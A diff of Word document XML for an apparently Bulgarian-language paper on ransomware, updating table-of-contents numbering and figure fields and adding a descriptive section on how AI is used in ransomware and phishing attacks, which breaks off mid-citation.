-          <w:hyperlink w:anchor="_Toc223385520" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468480" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1945,41 +1968,41 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">Подготовка за </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> инциденти</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve">Подготовка за </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve"> инциденти</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1990,7 +2013,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385520 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468480 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2010,7 +2033,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>18</w:t>
+              <w:t>19</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2031,10 +2054,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385521" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468481" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2047,7 +2070,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:val="en-US"/>
+                <w:lang w:eastAsia="bg-BG"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2077,7 +2100,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385521 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468481 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2097,7 +2120,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>19</w:t>
+              <w:t>20</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2118,10 +2141,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385522" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468482" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2133,7 +2156,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:val="en-US"/>
+                <w:lang w:eastAsia="bg-BG"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2163,7 +2186,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385522 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468482 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2183,7 +2206,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>20</w:t>
+              <w:t>21</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2204,10 +2227,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385523" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468483" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2220,34 +2243,34 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t xml:space="preserve">Phishing </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>атаки</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Phishing </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t>атаки</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -2258,7 +2281,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385523 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468483 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2278,7 +2301,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>21</w:t>
+              <w:t>22</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2299,10 +2322,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385524" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468484" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2315,34 +2338,34 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">Други форми на </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Social Engineering</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve">Други форми на </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Social Engineering</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -2353,7 +2376,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385524 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468484 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2373,7 +2396,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>22</w:t>
+              <w:t>23</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2393,15 +2416,100 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223385525" w:history="1">
+          <w:hyperlink w:anchor="_Toc223468485" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
+              <w:t>Какво да направим, ако станем жертва на</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> атака?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468485 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>24</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="bg-BG"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc223468486" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
               <w:t>Цитирани източници</w:t>
             </w:r>
             <w:r>
@@ -2423,7 +2531,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223385525 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223468486 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2443,7 +2551,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>23</w:t>
+              <w:t>25</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2486,7 +2594,7 @@
           <w:rFonts w:eastAsia="Aptos"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc223385505"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc223468464"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Aptos"/>
@@ -2764,7 +2872,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc223385506"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc223468465"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">История на </w:t>
@@ -3013,7 +3121,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc223385507"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc223468466"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Еволюция на </w:t>
@@ -3040,7 +3148,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc223385508"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc223468467"/>
       <w:r>
         <w:t xml:space="preserve">Ранна фаза на </w:t>
       </w:r>
@@ -3261,24 +3369,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>1</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3338,7 +3436,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc223385509"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc223468468"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3500,24 +3598,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3839,24 +3927,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>3</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3911,7 +3989,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc223385510"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc223468469"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -4002,6 +4080,9 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">През 2006 година се появява първия </w:t>
@@ -4038,64 +4119,6 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:sdt>
-        <w:sdtPr>
-          <w:id w:val="-1460947716"/>
-          <w:citation/>
-        </w:sdtPr>
-        <w:sdtContent>
-          <w:r>
-            <w:fldChar w:fldCharType="begin"/>
-          </w:r>
-          <w:r>
-            <w:instrText xml:space="preserve"> CITATION Gpc \l 1026 </w:instrText>
-          </w:r>
-          <w:r>
-            <w:fldChar w:fldCharType="separate"/>
-          </w:r>
-          <w:r>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-            <w:t>[8]</w:t>
-          </w:r>
-          <w:r>
-            <w:fldChar w:fldCharType="end"/>
-          </w:r>
-        </w:sdtContent>
-      </w:sdt>
-      <w:sdt>
-        <w:sdtPr>
-          <w:id w:val="-417558124"/>
-          <w:citation/>
-        </w:sdtPr>
-        <w:sdtContent>
-          <w:r>
-            <w:fldChar w:fldCharType="begin"/>
-          </w:r>
-          <w:r>
-            <w:instrText xml:space="preserve"> CITATION Gpc \l 1026 </w:instrText>
-          </w:r>
-          <w:r>
-            <w:fldChar w:fldCharType="separate"/>
-          </w:r>
-          <w:r>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-            <w:t xml:space="preserve"> </w:t>
-          </w:r>
-          <w:r>
-            <w:rPr>
-              <w:noProof/>
-            </w:rPr>
-            <w:t>[8]</w:t>
-          </w:r>
-          <w:r>
-            <w:fldChar w:fldCharType="end"/>
-          </w:r>
-        </w:sdtContent>
-      </w:sdt>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4178,6 +4201,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Undeletion</w:t>
@@ -4185,6 +4210,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> utility</w:t>
@@ -4291,24 +4318,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>4</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -4410,24 +4427,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>5</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>5</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -4463,7 +4470,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc223385511"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc223468470"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -4625,24 +4632,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>6</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>6</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -4675,7 +4672,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc223385512"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc223468471"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -4762,24 +4759,14 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>7</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>7</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -4956,21 +4943,430 @@
         </w:rPr>
         <w:t>ransomware-</w:t>
       </w:r>
+      <w:r>
+        <w:t>ът и се изисква откуп в биткойни.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="15" w:name="_Toc223468472"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Ролята на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">AI </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> атаките</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="15"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Използването на изкуствен интелект (ИИ) открива нов фронт в продължаващата борба срещу </w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>ът</w:t>
+        <w:t>ransomware</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> и се изисква откуп в биткойни.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t xml:space="preserve">. Както киберпрестъпниците, така и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">security </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">експертите </w:t>
+      </w:r>
+      <w:r>
+        <w:t>използват тази технология, за да подобрят своята производителност</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">През 2024 г. изкуственият интелект е бил използван за намаляване на </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">прага </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">за навлизане на хакери, създаване на по-персонализирани тактики, използване на уязвимости и изискване на по-високи откупи. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> атаките</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>достигат</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> рекордни върхове</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> последните две години</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и е много вероятно изкуственият интелект да изостри тази тенденция през 202</w:t>
+      </w:r>
+      <w:r>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> г.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Киберпрестъпниците използват </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AI</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> з</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">автоматизация на стратегиите за изграждане на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>което позволява бързо идентифициране на уязвимости и внедряване на силно персонализирани фишинг кампании.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="-2000725777"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
